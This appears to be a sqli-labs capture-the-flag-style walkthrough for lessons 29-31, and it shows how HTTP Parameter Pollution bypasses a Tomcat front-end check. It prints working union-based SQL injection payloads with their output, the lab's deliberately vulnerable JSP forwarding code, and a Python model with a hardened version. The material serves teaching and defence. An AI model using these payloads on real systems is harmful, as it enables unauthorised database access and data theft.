Table of contents
- 0. Environment setup
- 1. HPP
- 29. GET-WAF-Single quote
- 30. Blind 29
- 31. twist 30
This part covers sqli-labs lessons 29-31; the focus is HTTP Parameter Pollution (HPP).
0. Environment setup
Use jspstudy directly, which skips installing Tomcat and the other components by hand.
Point the jspstudy site domain at the jspstudy/www path, port 8080 (the default is 80).
In each lesson's index.jsp, change the URL on line 27 to the real local path; this is the path configured in my VM:
URL sqli_labs = new URL("http://localhost/phproot/sqli-labs/Less-29/index.php?"+ qs);
1. HPP
HTTP Parameter Pollution can be used to bypass security checks.
First, the two-tier server architecture:
(Diagram: client -> tomcat -> apache)
Both Apache and Tomcat can run as standalone web servers. Apache is a web server that only handles static HTML; Tomcat is a Java application server that handles both static HTML and dynamic JSP/Servlets.
The situation discussed here is: the client sends a request to Tomcat, and Tomcat in turn sends a request to Apache.
The following lists how some common web servers handle a parameter whose name appears more than once:
Web server | Parameter-fetching function | Value obtained
PHP/Apache | $_GET("par") | Last
JSP/Tomcat | Request.getParameter("par") | First
Perl(CGI)/Apache | Param("par") | First
ASP/IIS | Request.QueryString("par") | All (comma-delimited string)
Python/Apache | getvalue("par") | All (List)
Now straight to the lessons.
29. GET-WAF-Single quote
Visit /sqli-labs/Less-29/index.jsp?id=1
Your Login name:Dumb
Your Password:Dumb
Test for the closing character and injection:
?id=1'
?id=1' '
No matter what is entered, an error page is returned. This is because the Tomcat server performs a check (think of it as a WAF).
The web server here is Apache (you can check with the Wappalyzer browser extension), which takes the last of repeated parameters, so visit /sqli-labs/Less-29/index.jsp?id=1&id=2
Your Login name:Angelina
Your Password:I-kill-you
Visit /sqli-labs/Less-29/index.jsp?id=1&id=2&id=3
Your Login name:Dummy
Your Password:p@ssword
As expected. Now test for the closing character and injection again:
?id=1&id=1'
-- You have an error in your SQL syntax;....
?id=1&id=1' '
-- Your Login name:Dumb
-- Your Password:Dumb
OK, the bypass works and the closing character is a single quote. Continue building the payload:
-- determine the column count and place markers
?id=1&id=-1' union select 1,2,3 -- x
-- Your Login name:2
-- Your Password:3
-- retrieve information
?id=1&id=-1' union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security
Retrieving table names, database names and columns afterwards follows the usual routine.
Look at the source:
<%-- imports needed by the snippet below (not shown in the original excerpt) --%>
<%@ page import="java.net.URL, java.net.URLConnection, java.io.BufferedReader, java.io.InputStreamReader" %>
<%
String id = request.getParameter("id"); // this is how JSP fetches a GET parameter: only the FIRST id (here id=1)
String qs = request.getQueryString();   // the raw query string, which still contains every id
if(id!=null){
    if(id!=""){ // reference comparison as in the lab source; !id.isEmpty() is what is meant
        try{
            String rex = "^\\d+$"; // check that id is numeric; the value checked is the first id, id=1
            Boolean match=id.matches(rex);
            if(match == true){
                // the unmodified query string is forwarded to PHP, which uses the LAST id
                URL sqli_labs = new URL("http://localhost/phproot/sqli-labs/Less-29/index.php?"+ qs);
                URLConnection sqli_labs_connection = sqli_labs.openConnection();
                BufferedReader in = new BufferedReader(new InputStreamReader(sqli_labs_connection.getInputStream()));
                String inputLine;
                while ((inputLine = in.readLine()) != null) out.print(inputLine);
                in.close();
            }else{
                response.sendRedirect("hacked.jsp"); // testing the closing with only the first id redirects to the failure page
            }
        } catch (Exception ex){
            out.print("<font color= '#FFFF00'>");
            out.println(ex);
            out.print("</font>");
        }finally{}
    }
}else{
    URL sqli_labs = new URL("http://localhost/phproot/phproot/sqli-labs/Less-29/index.php"); // PHP is also visited when there is no parameter
}
%>
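An added Python example (not from this post or from sqli-labs) that models the first/last/all rules from the table above and puts the Less-29 front-end check beside a hardened version; the query string is constructed, and the function names are my own.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Constructed query string in the shape the lesson uses; not a captured request.
SAMPLE_QS = "id=1&id=-1' union select 1,2,3 -- x"

# Equivalent of the Java String.matches("^\\d+$") check in index.jsp
# (fullmatch is used because Python's '$' would also accept a trailing newline).
ID_RE = re.compile(r"\d+")


def pairs(qs):
    """Split a raw query string into (name, value) pairs, order preserved."""
    return parse_qsl(qs, keep_blank_values=True)


def get_first(qs, name):
    """JSP/Tomcat request.getParameter(): the first occurrence wins."""
    return next((v for k, v in pairs(qs) if k == name), None)


def get_last(qs, name):
    """PHP/Apache $_GET: the last occurrence wins."""
    vals = [v for k, v in pairs(qs) if k == name]
    return vals[-1] if vals else None


def get_all(qs, name):
    """ASP/IIS and Python CGI: every occurrence (ASP joins them with commas)."""
    return [v for k, v in pairs(qs) if k == name]


def jsp_front_check(qs):
    """What Less-29 index.jsp does: validate only the first id, then forward
    the untouched query string to PHP, which will pick the last id."""
    first = get_first(qs, "id")
    if first is None or first == "" or not ID_RE.fullmatch(first):
        return None                      # would redirect to hacked.jsp
    return qs                            # forwarded verbatim: the second id rides along


def hardened_front_check(qs):
    """Defensive version: refuse duplicate names, validate the single value,
    and rebuild the forwarded query string from the validated value only."""
    ids = get_all(qs, "id")
    if len(ids) != 1 or not ID_RE.fullmatch(ids[0]):
        return None
    return urlencode({"id": ids[0]})


if __name__ == "__main__":
    print("Tomcat sees id =", get_first(SAMPLE_QS, "id"))
    print("PHP sees id    =", get_last(SAMPLE_QS, "id"))
    print("original check forwards:", jsp_front_check(SAMPLE_QS))
    print("hardened check forwards:", hardened_front_check(SAMPLE_QS))
```

The same divergence applies to any parameter the front tier validates and the back tier re-parses, so the hardened check is worth applying to every forwarded name, not just id.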
30. Blind 29
Determine the closing character:
?id=1&id=1'
-- normal
?id=1&id=1"
-- no username/password
?id=1&id=1""
-- username/password shown
The closing character is a double quote.
-- determine the column count and place markers
?id=1&id=-1" union select 1,2,3 -- x
-- Your Login name:2
-- Your Password:3
-- retrieve information
?id=1&id=-1" union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security
Looking at the PHP source, print_r(mysql_error()) is commented out as well, though error-based injection was not used here anyway.
31. twist 30
Determine the closing character:
?id=1&id=1'
-- username/password shown normally
?id=1&id=1"
-- syntax error reported: "1"") LIMIT 0,1
From the error, the closing is a double quote plus a parenthesis.
?id=1&id=-1") union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security